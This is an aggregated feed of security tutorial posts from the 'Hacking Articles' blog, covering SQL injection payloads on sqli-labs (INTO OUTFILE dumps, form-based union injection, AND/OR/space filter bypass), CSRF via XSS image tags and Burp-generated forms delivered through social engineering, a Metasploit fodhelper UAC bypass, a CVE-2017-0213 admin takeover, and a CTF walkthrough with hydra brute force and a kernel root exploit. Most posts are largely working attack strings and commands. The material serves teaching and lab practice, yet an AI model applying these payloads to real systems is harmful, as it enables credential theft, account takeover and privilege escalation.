News from 'Hacking Articles'

Syndicate content
Raj Chandel's Blog
Updated: 45 min 40 sec ago

Dumping Database using Outfile

6 hours 33 min ago

In our previous  article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. Today we are going to perform SELECT…INTO OUTFILE statement is easiest way of exporting a table records into a text file or excel file

 This statement allows user to load table information very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the significant rows to a file, and gives authority to the use of column and row terminators to specify output format. The output file is created directly by the MySQL server, so the filename with path should be specify where user want the file to be written on the server host. The file must not exist already on server. It cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type following SQL query in URL

http://localhost:81/sqli/Less-7/?id=1

From screenshot you can read “you are in….. Use outfile” now let’s try to break this statement.

OKAY! The Query has been broken successfully we receive the error message when we had used single quote (‘) in order to break query hence it confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1

After making lots of efforts finally successfully the query gets fixed, if noticed the step for SQL injection is similar as previous chapter only techniques to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1))    –+

Now following query will dump the result into a text file. Here you need to mention the path where user wants the file to be written on the server host. The file must not exist already on server user always use new text file for over writing database information.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,2,3 into outfile “/xampp/htdocs/sqli/Less-7/hack1.txt” –+

 From screenshot you can perceive that still it is showing error message now open another tab for the output of resultant query.

http://localhost:81/sqli/Less-7/

Now add file name hack1.txt to check output of above query.

http://localhost:81/sqli/Less-7/hack1.txt

hence you can see we get output of executed query inside text file. This will save hack1.txt file inside the server machine also.

Execute following query to retrieve database name using union injection using a new text file.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,2,database() into outfile “/xampp/htdocs/sqli/Less-7/hack2.txt” –+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully get security as database name as result.

Next query will provide entire table names saved inside the database using another text file.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile “/xampp/htdocs/sqli/Less-7/hack3.txt” –+

http://localhost:81/sqli/Less-7/hack3.txt

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’ into outfile “/xampp/htdocs/sqli/Less-7/hack4.txt” –+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains so many columns inside it I had chosen only two columns for further enumeration.

C1: username

C2: password

At last execute following query to read all username and password inside the table users from inside its column.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(username),group_concat(password)from users into outfile “/xampp/htdocs/sqli/Less-7/hack5.txt” –+

http://localhost:81/sqli/Less-7/hack5.txt

From screenshot you can read the username and password save inside text file.

Note: you can try same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Dumping Database using Outfile appeared first on Hacking Articles.

Categories: Cyber India

CSRF Exploitation using XSS

Sat, 24/Jun/2017 - 16:44

Hello friends! In our previous article we saw how an attacker can shoot web application against CSRF vulnerability with help of burp suite. Today again we are going to test CSRF attack with help of XSS vulnerability.AS we know taking the help of XSS attacker might be able to reads cookies from the same domain and if CSRF token are stored in cookies then attacker will able to read the CSRF token from CSRF protected post.

Let’s have a look how an attacker can make CSRF attack for changing password of admin account when the web application is suffering from cross site scripting vulnerability. For this tutorial I had used DVWA and set its security level low.

Suppose that you have found XSS vulnerability in any web application server. Here we are going to use java script or HTML script which will make CSRF attack for changing the password of admin account.

An XSS attack can be used to read the cookies and get the valid tokens if it is stored in cookies which have to be inserted in the malicious script to make CSRF possible. Using image tag we will send a malicious script, inside script I had set new password as 123456.

<img src=”/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change”>

Now let’s check whether the password for admin has been changed or not, previously credential was admin: password, if admin get failed to login inside web server using his previous credential then we had successfully made CSRF attack.

From given screenshot you can see using admin: password it confirms login failed. Now use your new password 123456 for login inside web server.

Similarly there is another web application bwapp where we will demonstrate same attack using XSS vulnerability. First you need to chose your bug “cross site scripting Reflected (post)” and set security level low.

In given screenshot the form is suffering from XSS vulnerability now we are going to generate a script for making CSRF possible in order to change password for a user. Here we are login as bee: bug into web server now we will try to change its password with help of cross site scripting.

Similarly using image tag we will send a malicious script, inside script I had set new password as hack.

<img src=”/bwapp/csrf_1.php?password_new=hack&password_conf=hack&action=change”>

From screenshot you can see generated image icon which means this form has XSS flaws now let check whether the password has been modified or not for user bee.

Now use previous credential bee: bug if login failed is confirmed it means we have successfully shoot the CSRF attack and from screenshot you can see “invalid credential or user not activated” message.  Now use new password for login into web server.

Conclusion: XSS vulnerabilities exist anywhere in same domain it could lead to CSRF attack and allows attackers to remotely control the target’s browser with full rights, making CSRF useless.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post CSRF Exploitation using XSS appeared first on Hacking Articles.

Categories: Cyber India

Understanding Encoding (Beginner’s guide)

Thu, 22/Jun/2017 - 17:07

From Wikipedia

This article will describe the different type of process involves in encoding of data.

The term encoded data means wrapped data and the process of encoding is used to transform the data into a different format so that it can be easily understood by different type of system. For example ASCII characters are encoded by means of numbers ‘A’ is represented with 65, where as ‘B’ with 66 an so on.

As we known computer does not understand human languages therefore we need to encode the data into binary language which is easily readable by computer systems hence encoding is very important. It utilises such schemes that are widely available so that it can simply be reversed. Encoding means data transformation, not data encryption consequently it does not need a key in decoding.

URL Encoded

The internet only accepts URL’s in ASCII format, URL encoding entails encoding certain parts of the URL character set. This process takes one character and converts it into a character triplet that has a prefix of “%” followed by two digits in hexadecimal format. 

Character Encoded : %3A / %2F # %23 ? %3F & %24 @ %40 % %25 + %2B <space> %20 ; %3B = %3D $ %26 , %2C <  %3C >  %3E ^ %5E ` %60 \ %5C [ %5B ] %5D { %7B } %7D | %7C “ %22

Example :

Original URL: http://www.hackingarticles.in

Encoded URL: http%3A%2F%2Fwww.hackingarticles.in

 Hexadecimal

Hexadecimal or Base 16 is a positional number system which consists of 16 distinct symbols which range from 0 to 9 in numerals and both upper and lowercase alphabets which range from A to F which represent numeric values 10 to 15

Step 1 – is to get the decimal value of an alphabet, this is different for both upper and lower case, eg: A = 65 and a = 97. In order to find the value of any alphabet, we count down to it from ”A” or “a”, the values are in single digit succession, eg: A = 65 B = 66 C = 67 and so on / a = 97 b = 98 c = 99 and so on.

Step 2 – To convert from decimal to hexadecimal, take the decimal value and divide it by 16, the hex value will be written beginning from the quotient all the way up to the remainder. So, the hex value of 97 will be 61.

Eg:

16 97 1 6 6 Source R a j Decimal Value 82 97 106 Hexadecimal value 52 61 6a  Base64

Each base64 digit represents exactly 6 bits of data.Is a radix-64 representation of ASCII string, here’s how we get it?

 Step 1 – is to get the decimal value of an alphabet, this is different for both upper and lower case, eg: A = 65 and a = 97. In order to find the value of any alphabet, we count down to it from”A” or “a”, the values are in single digit succession, eg: A = 65 B = 66 C = 67 and so on / a = 97 b = 98 c = 99 and so on.

Step 2 – is to divide the decimal value by 2, where ever there is a reminder it is denoted as “1” and where ever the remainder is “0”, it is denoted as “0”, continue to divide till you reach 0 or 1 and cannot divide any further. The binary value will be the denoted 1’s and 0’s counted from last to first.

Eg:In order to get a 8-bit value we prefix a “0” to the value, eg: 01010010 and this gives us the binary value of “a”.

2 97 1 2 48 0 2 24 0 2 12 0 2 6 0 2 3 1   1 1

Step 3 – Write the values of all the characters in binary and make pairs of 6 (6-bit), eg: binary value of “Raj” in 8-bit = 010100 100110 000101, binary value of “Raj” in 6-bit = 010100 100110 000101 101010.

Step 4 – Write the 6-bit decimal value of the pairs we make in Step 3 and adding all the values where we have 1’s

32 16 8 4 2 1 0 1 0 1 0 0 20 1 0 0 1 1 0 38 0 0 0 1 0 1 5 1 0 1 0 1 0 42

Step 5 – Use the Base64 table to lookup the values we get in Step 4.

The Base64 index table:

Value Char Value Char Value Char Value Char 0 A 16 Q 32 g 48 w 1 B 17 R 33 h 49 x 2 C 18 S 34 i 50 y 3 D 19 T 35 j 51 z 4 E 20 U 36 k 52 0 5 F 21 V 37 l 53 1 6 G 22 W 38 m 54 2 7 H 23 X 39 n 55 3 8 I 24 Y 40 o 56 4 9 J 25 Z 41 p 57 5 10 K 26 a 42 q 58 6 11 L 27 b 43 r 59 7 12 M 28 c 44 s 60 8 13 N 29 d 45 t 61 9 14 O 30 e 46 u 62 + 15 P 31 f 47 v 63 /

 The Base64 encoded value of Raj is UmFq. Encoded in ASCII, the characters R, a, and j are stored as decimal values 82, 97, and 106, their 8-bit binary values are 01010010, 01100001, and 01101010. These three values are joined together into a 24-bit string, producing 010100100110000101101010. Groups of 6 are converted into individual numbers from left to right. While converting from 8-bit to 6-bit, 0’s are added to fill the last slots, so that a full pair of 6 can be made.

The full conversion of “Raj” to Base64 is shown in Table 1.1 and the individual conversion of “R” and “Ra” of “Raj” are shown in Tables 1.1 and 1.2 to show a breakdown of the process with explanation

Raj                                               82 97 106                             01010010 01100001 01101010


In the Table 1.2, for character “R” of “Raj”, the values in the Bit patternsection are in 8-Bit format and they are being converted into 6-Bit and the decimal value of the 6-Bit pairs are in the Index section.Table 1.1

The same process is repeated in Table 1.3 for characters “R” and “a” of “Raj”.

For each pair of extra 0’s that are added to complete a pair of 6, an “=” is added for each pair, so the ACHII value of “0 0” is “=”.

In table 1.4 to further build on the logic used in table 1.2 and 1.3, “Raaj” is converted to “UmFhag==” in Base64, with the addition of an additional “a”, the complexity of the conversion increases. In the Indexsection we can see an additon of 33, 26 and 32 due to the change in the bit pattern. 

For each pair of extra 0’s that are added to complete a pair of 6, an “=” is added for each pair, so the ACHII value of “0 0” is “=”, as done in table 1.2 and 1.3.

Rot13

This is a letter substitution cypher, it’s conversion process from plain text to cypher test is dicinging the total number of alphabets in half: A to M and N to Z. The first half mirriors the second half and vice versa. So, A = N and N = A.

Eg: Rot13 of Raj = Enw

A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

 

The post Understanding Encoding (Beginner’s guide) appeared first on Hacking Articles.

Categories: Cyber India

Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

Thu, 15/Jun/2017 - 22:23

Hello friends! Today we are going to share new article related to how to bypass window 10 UAC once you have hacked the victim’s system. In metasploit a new module has been added to achieve admin access in window 10s.

Attacker: kali Linux

Target: windows 10

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

use exploit/windows/local/bypassuac_fodhelper

msf exploit(bypassuac_fodhelper) >set session 1

msf exploit(bypassuac_fodhelper) >exploit

Hence you can see another meterpreter session 2 opened which means we successfully exploited the target once again now let’s check user privilege.

Meterpreter > getsystem

 Awesome!!!! We got admin privilege successfully.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key) appeared first on Hacking Articles.

Categories: Cyber India

Understanding the CSRF Vulnerability (A Beginner Guide)

Sun, 11/Jun/2017 - 23:02

Today we will see CSRF attack in different scenario like transferring fund and password changing but before we see how cross site request forgery works we need to understand of few concepts.

Tabbed browsing: Tabbed browsing is an attribute of the Web browsers which allow the users to view multiple web sites on a single window instead of opening new browser window. These extra web pages are represented by tabs at the top of the browser window.

Imagine that you are logged into the Facebook server and visit a malicious website in the same browser, although on different tab. In absence of the same origin policy (SOP), an attacker can go through your profile and other sensitive information with the help of JavaScript. For example read private messages, send fake message, read your chats.

SOP: The same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.

XHR: XML Http Request is an API in the form of an object whose methods transfer data between a web browser and a web server. 

  • Update a web page without reloading the page
  • Request data from a server – after the page has loaded
  • Receive data from a server  – after the page has loaded
  • Send data to a server – in the background

CSRF: Cross-site request forgery also known as single-click attack or session traversing, in which a malicious website will throw a request to a web application that the user is already authenticated against from a different website. This way an attacker can access functionality in a targeted web application via the victim’s already authenticated browser.

If the victim is an ordinary user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the targeted end user is the administrator account, this can compromise the entire web application.

In this article we will test a web application against csrf vulnerability with the help of burp suit Poc.

Source https://www.w3schools.com/xml/xml_http.asp

https://en.wikipedia.org/wiki/Same-origin_policy

Let’s start!!

 For this tutorial I had used bWAPP the vulnerable web application and create a new user raaz with password 123 for login inside the web server.

Now set the security level low then from list of given vulnerability choose your bug cross site request forgery (change secret) and click on hack.

If you have noticed the first image for creating a new user in that the user “raaz” has set his secret value as 123 now if the user raaz wish to change the secret value for his password he can change it from here.

Now let’s check out how we can test this functionality against CSRF attack and force raaz to change his secret value from the attacker’s desired value that is set a new secret value without his (user) knowledge.

Start the burp suite to capture the sent request between the browser and web application.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

CSRF PoC generator will automatically generates an HTML form page which you can see in given below screenshot, Click on copy HTML tag and open a text document to past the copied data.

Once you have paste the html code now add your (attacker) secret value “1234” moreover you need to add user name “raaz” for whom the secret value will get changed, now save the text document as csrf1.html and then use social engineering technique for sharing csrf1.html file to the targeted user.

When victim will open Csrf1.html file, here he will found a submit button now as he will click on submit button the secret value for target location will get changed without his (victim) knowledge.

Here you observe the result form given below screenshot. Hence in this way CSRF attack change the old secret value for password set by user “raaz”.

In next scenario we are going to test CSRF attack while transfer amount from users account. You might be well aware from such scenario when phone operator let say Airtel transfer an amount (Rs 500) in order to recharge customer phone and user receive the message of transaction and other example is related  bank amount transfer from one user’s account to another user’s account.

In order to learn csrf attack in this situation again login in bWAPP then choose your next vulnerability cross site request forgery (transfer Amount) and click on hack.

In the given screenshot you can see user have only 1000 EUR in his account it means above this amount the transaction  is not possible for both (user as well as for attacker). Further it is showing user’s account number to transfer and amount to be transfer.

The procedure for csrf attack is similar as above use burp suite to capture the sent request of browser.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

Again it will create html form automatically for intercepted data now click on copy html tag given at below to copy the generate html code for form.

Open a text document to past the copied data, Once you have paste the html code now add your (attacker) amount “100” to be transfer, now save the text document as csrf2.html and then use social engineering technique for sharing csrf2.html file to the targeted user.

When victim will open Csrf2.html file, here he will found a submit button now as he will click on submit button given amount will be transfer without his (victim) knowledge.

From given screenshot result you see now the amount is left 900 EUR in user’s account which means 100 EUR has been deducted from his account. Hence again we saw effect of CSRF attack while amount transaction from once account to another.

At last we are going to learn the most impactful CRSF attack for changing the password of user account without his knowledge. Again we will login into bwapp and choose the bug “cross site request forgery (change password)” to test the csrf vulnerability.

Here you can clearly saw two text field, one for new password another for confirm password again we will repeat the process using burp suite to catch the request of browser.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

Once again it has generated the html code for changing the password, hence you can see burp suite itself generate related html form for destination website, and this is an advantage which save attacker’s time for generating CSRF html form. Again click on copy html tab to copy the code.

Open a text document to past the copied data, Once you have paste the html code now add your (attacker)new password value and confirm password value, now save the text document as csrf3.html and then use social engineering technique for sharing csrf3.html file to the targeted user.

If you remember the old password was “123” for user “raaz” and from screenshot you can perceive that now new password is raj.

When victim will open Csrf3.html file, here he will found a submit button now as he will click on submit button the password will reset for his account without his (victim) knowledge.

Hence you can verified it through given below image where it has clearly gave the message that “password has been changed”

So today you have seen how we had made csrf attack on web application server in different scenario with help of burp suite Poc.

Try it yourself!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Understanding the CSRF Vulnerability (A Beginner Guide) appeared first on Hacking Articles.

Categories: Cyber India

Form Based SQL Injection Manually

Fri, 09/Jun/2017 - 22:13

In our previous article we had perform Form Based SQL injection using sqlmap but today we are going to perform Form Based SQL injection  in DHAKKAN manually. There are so many example related to login form like: Facebook login; Gmail login; other online accounts which may ask you to submit your information as username and password.

Let’s start!! 

LESSON 11

 This lesson is much similar to lesson 1,2,3,4 if you not familiar to these lessons then please go through it from here. You will come to know how to perform SQL Injection manually step by step in order to retrieve the data from inside the database system.

Lesson 11 is regarding POST error based single quotes (‘) string so when you will explore this lab on the browser you will observe that it contains text field for username and password to login inside web server. As we are not true user so we don’t know the correct username and password but being hacker we always wish to get inside the database with help of SQL injection. Therefore first we will test whether the database is vulnerable to SQL injection or not.

Since lesson itself sound as error based single quotes (‘) string, thus I had used single quotes () to break the query inside the text field of username then click on submit.

Username:      ’

 From the given screenshot you can see we have got error message (in blue color) which means the database is vulnerable to SQL injection. 

So we when break the query we get error message, now let me explain what this error message says.

The right syntax to use near ”” and password=” LIMIT 0,1’

Now we need to fix this query with help of # (hash) comment; so after adding single quotes (‘) add a hash function (#) to make it syntactically correct.

Username:  ‘   #

From screenshot you can see it has shown login attempted failed though we have successfully fixed the blue color error message.

Now whatever statement you will insert in between and # the query will execute successfully with certain result according it. Now to find out number of columns used in the backend query we’ll use order by clause

Username:  ‘ order by 1 #

Username:  ‘ order by 2 #

Username:  ‘ order by 3 #

 From screenshot you can see I received error at order by 3 which mean there are only two columns used in the backend query

Similarly insert query for union select in between and # to select both records.

Username:  ‘ union select 1,2 #

From screenshot you can see it also shown successfully logged in, now retrieve data from inside it.

Next query will fetch database name, it is as similar as in lesson 1 and from screenshot you can read the database name “security

Username:  ‘ union select 1,database() #

Through given below query we will be able to fetch tables name present inside database.

Username:  ‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query

Username:  ‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #

Their so many columns but we interested in username and password only.

At last execute following query to read all username and password inside the table users.

Username:  ‘ union select group_concat(username),group_concat(password) from users   #

Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.

This is all about single quotes string error based injection in lesson 11.

Lesson 12

In some scenario you will try to use single quotes string for test SQL vulnerability or will go extend in order to break the query even after knowing that database is vulnerable but you will be not able to get break the query and receive error message because might the developer had blacklist the single quotes (‘) at the backend query.

Lesson 12 is similar to previous lesson 11 but here you will face failure if you used single quotes for breaking the query, since the chapter sound closed to post Error based double quotes string (“). Thus I had used double quotes () to break the query inside the text field of username then click on submit.

username: 

From the given screenshot you can see we have got error message (in blue color) which means the database is vulnerable to SQL injection. 

So we when break the query we get error message, now let me explain what this error message says.

The right syntax to use near ‘”””) and password=(“”) LIMIT 0,1’

Now we need to fix this query with help of ) closing parenthesis and  # (hash) comments; so after double quotes (“) add ) closing parenthesis  hash function (#) to make it syntactically correct.

username:  “)   #

From screenshot you can see it has shown login attempted failed though we have successfully fixed the blue color error message.

Now whatever statement you will insert in between ‘) and # the query will execute successfully with certain result according it. Now to find out number of columns used in the backend query we’ll use order by clause

username:  “) order by 3 #

From screenshot you can see I received error at order by 3 which means there are only two columns used in the backend query

Similarly insert query for union select in between ‘)and # to select both records.

Username:  “) union select 1,2 #

 From screenshot you can see it also shown successfully logged in, let’s now retrieve data from inside it.

Next query will fetch database name, it is as similar as in lesson 1 and from screenshot you can read the database name “security

Username:  “) union select 1,database() #

Through given below query we will be able to fetch tables name present inside database.

Username:  “) union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query

Username:  “) union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #

Their so many columns but we interested in username and password only.

At last execute following query to read all username and password inside the table users.

Username:  “) union select group_concat(username),group_concat(password) from users   #

Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.

This is all about double quotes string error based injection in lesson 12.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Form Based SQL Injection Manually appeared first on Hacking Articles.

Categories: Cyber India

Bypass Admin access through guest Account in windows 10

Thu, 08/Jun/2017 - 11:43

Open command prompt and check windows user account status using “whoami” command.

Account name is “joe” and account status is ‘DefaultAccount’ which is a non-administrator account type.

Try changing administrator using the ’net user’ command. You will see an error ‘Access is denied’

Now download “CVE-2017-0213_x64” from here and unzip in your PC. Go to the folder and you can find the .exe file, double click on it to run it.

The moment you double click on it, it will automatically open a new command prompt with administrator privileges.

Use ‘net user’ command to change the administrator account password. Message ‘The command completed successfully’ will appear. You have now successfully changed the administrator accounts password.

Author– Abhimanyu Dev is an Aspiring Cyber Security Expert Contact Here

The post Bypass Admin access through guest Account in windows 10 appeared first on Hacking Articles.

Categories: Cyber India

Hack the Super Mario (CTF Challenge)

Wed, 07/Jun/2017 - 21:03

Hello friends!! Might you people have played THE SUPER MARIO game once in your childhood and no wonder if a thought have been strike in your mind to hack the game. So whatever you had thought today we are going to make it true and for that you guys need to download the new VM machine for super Mario from here.

The credit for developing this VM machine is goes to Mr_h4sh who has hide 2 flag inside this lab as a challenge for hackers. The level of the challenge is Intermediate.

Let’s breach!!!

 As you know we always start with enumeration, therefore open the terminal in your kali Linux and go for aggressive scan with nmap.

nmap –p- -A 192.168.0.5

Since port 22 and port 8180 for service SSH and HTTP respectively therefore I choose port 8081 for enumeration but from screenshot you can see I didn’t get any remarkable result.

Dirb http://192.168.0.5:8180

Then I move for directory brute force attack using following command

Dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

In the given below screenshot you can read it has shown a file name vhosts, let’s explore it through browser.

Now explore vhost in URL as  http://192.168.0.5:8180/vhosts here vhosts stand for virtual host it is method for hosting multiple domain on a single server. From inside Vhosts I came know the Server Name is mario.supermariohost.local  

Let’s add mario.supermariohost.local into /etc as new localhost

Cd etc

Vim hosts

Now type “192.168.0.5 mario.supermariohost.local” inside the vim editor to add it in the /etc/host and after then type wq to save it.

Now Type Cat hosts to check added host name Hence you from screenshot you can see it has been had added inside it successfully.

Then I visit mario.supermariohost.local on browser and finally got Mario as browser game but it is not working.

Since we know port 22 and 8081 was open and we didn’t get much information from enumeration of port 8081. Now we will move towards port 22 for SSH enumeration therefore I had prepared a dictionary in order to retrieve credential to login inside SSH server. 

Dictionary contains username which was the famous character of MARIO, you can check these name from Google also.

Inside text editor type following name: Mario; luigi; peach; toad; yoshi and save file as user on desktop.

Use john the ripper to generate dictionary of password using following command here –rules will enable the wordlist and –stdout will define a fix length of password to be generate on the desktop as pass.

John –wordlist : user –rules –stdout > pass

Finally we have username dictionary as user and password dictionary generated by john as pass, now we have to match perfect combination of user and pass in order to retrieve credential for SSH login. I had chosen hydra for password cracking, you can choose any other password cracking tool also.

Hydra –L user –P pass 192.168.0.5 ssh

From the given screenshot you read the matched combination of username: luigi and password: luigi1 for SSH server.

Now type following for SSH login

Ssh luigi@192.168.0.5

Password luigi1

Yeeppiii!!!!  Finally we have login inside SSH server.

Uname –a

Here we come to know that the version for linux  supermariohost 3.13.0; let’s checkout its exploit on Google.

Yes, there is an exploit for 3.13.0 overlayfs local root in ubuntu , download it from here inside your kali Linux.

Form screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation. 

Now type following command for downloading Mario.c inside target system.

wget http://192.168.0.6/mario.c

The file is successfully downloaded inside it now type another command to compile Mario.c

gcc Mario.c -o mario

./Mario

Id

Cd/root

Ls

Awesome!!! We have got root privilege and from screenshot you can see inside its directory I have got zip file as flag.zip

Now type following command to download flag.zip on the desktop of your kali Linux

scp /root/flag.zip root@192.168.0.6:/root/Desktop

Fcrackzip flag.zip –D –P /user/share/wordlist/rockyou.txt -u
As shown in given screenshot PASSWORD FOUND!!! : pw ==ilovepeach; now you can unzip your file using this password.

Unzip flag.zip

It will ask for password, give above password to unzip it and again if you notice the given image it contains flag.txt

Cat flag.txt

1st FLAG: Well done: D If you reached this it means you got root, congratulations.

Now follow the given below step in order to complete another challenge.

Iptables –L

Here from screenshot you can see a new network has been added on remote system.

arp –n

Now the target system has been forwarded on a new IP 192.168.122.112

Ls -la

Found a directory .bak

Cd /.bak

Ls

Cd users

Cd luigi

Ls

There are two files inside it let’s read them one by one

Cat message

Hi Luigi,

Since you’ve been messing around with my host, at this point I want to return the favour. This is a “war”, you “naughty” boy!

cat id_rsa.pub

The highlighted word in the given text may appear like a username for login into SSH server.

Let ensure by login into ssh -i id_rsa warluigi@192.168.1.122.112

Great!! All assumption had given positive result

Again check for kernel version

uname -a

Woooww!! It is same version now we can use our Mario.c exploit for root privilege. Hence repeat the above step as shown in images.

Wget http://192.168.0.6/maio.c

The file is successfully downloaded inside it now type another command to compile Mario.c

Gcc Mario.c –o Mario

./Mario

Id

Cd /root

Ls –la

Here I found two important files 1st hint.txt 2nd flag2.zip before going for unzip flag.zip we must look towards hint.txt file.

Cat .hint.txt

Peach Loves Me” it might be the password key for decrypting the flag2.zip file 

Now let download fla2g.zip on the desktop of kali Linux by using following again

Scp /root/flag2.zip root@192.168.0.6:/root/Desktop

Unzip flag2.zip

Now when it will ask for password key type “Peach Loves Me

It contains flag2.txt inside type cat flag2.txt to open this file.

2nd FLAG: Congratulations on your second flag!

  Wonderful!!! We have caught both flags

Rajat Chikara is An Ethical HackerCyber Security Expert, Penetration Tester, India.

The post Hack the Super Mario (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

How to Bypass SQL Injection Filter Manually

Sat, 03/Jun/2017 - 23:09

In previous article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. The reason behind that is the protection that developer had applied to prevent SQL injection, sometimes developer use filters to strip out few characters and OPERATORS from the user input before adding it to the query for SQL statement to prevent SQL Injection. Today’s article will help you to face such situations and will tell you how to bypass such filters. Here again we’ll be using DHAKKAN SQLI labs for practice.

 Let’s start!!

 LESSION 25

In Lab 25 OR and AND function are Blocked here we will try to bypass sql filter using their substitute.

function blacklist($id)

$id= preg_replace(‘/or/i’,””, $id);                              //strip out OR (non case sensitive)

$id= preg_replace(‘/AND/i’,””, $id);                         //Strip out AND (non case sensitive)

Since alphabetic word OR, AND are blacklisted, hence if we use AND 1=1 and OR 1=1 there would be no output therefore I had use %26%26 inside the query.

 Following are replacement for AND and OR

AND :   &&   %26%26 

OR  :  || 

Open the browser and type following SQL query  in URL

http://localhost:81/sqli/Less-25/?id=1′ %26%26 1=1 –+

From screenshot you can see we have successfully fixed the query for AND (&&) into URL encode as %26%26. Even when AND operator was filtered out.

Once the concept is clear to bypass AND filter later we need to alter the               SQL statement for retrieving database information.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,2,3 %26%26 1=1 –+   

Type following query to retrieve database name using union injection

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,database(),3 %26%26 1=1 –+

 hence you can see we have successfully get securtiy as database name as result.

 

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database() %26%26 1=1 –+

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name=’users’ %26%26 1=1 –+

Hence you can see it contains 4 columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(username),3 from users –+

From screenshot you can read the fetched data.

Hence in lesson 25 we have learn how to bypass AND, OR filter for retrieving information inside the database.

LESSION 26

You will find lab 26 more challenging because here space,Comments,OR and AND are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

preg_replace(‘/or/i’,””, $id);                                       //strip out OR (non case sensitive)

$id= preg_replace(‘/and/i’,””, $id);                          //Strip out AND (non case sensitive)

$id= preg_replace(‘/[\/\*]/’,””, $id);                       //strip out /*

$id= preg_replace(‘/[–]/’,””, $id);                            //Strip out —

$id= preg_replace(‘/[#]/’,””, $id);                             //Strip out #

$id= preg_replace(‘/[\s]/’,””, $id);                            //Strip out spaces

$id= preg_replace(‘/[\/\\\\]/’,””, $id);    //Strip out slashes

This lab has more filters as compared to lab 25  because here space,Comments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-26/?id=1’%a0%26%26’1=1

From screenshot you can see we have successfully fixed the query for SPACE into URL encode as %a0

Blanks = (‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’ ‘%a0’)

Once the concept is clear to bypass AND, OR and SPACE filter later we need to alter the                SQL statement for retrieving database information.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,2,3%a0%26%26’1=1

Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,database(),3%a0%26%26%’1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26’1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

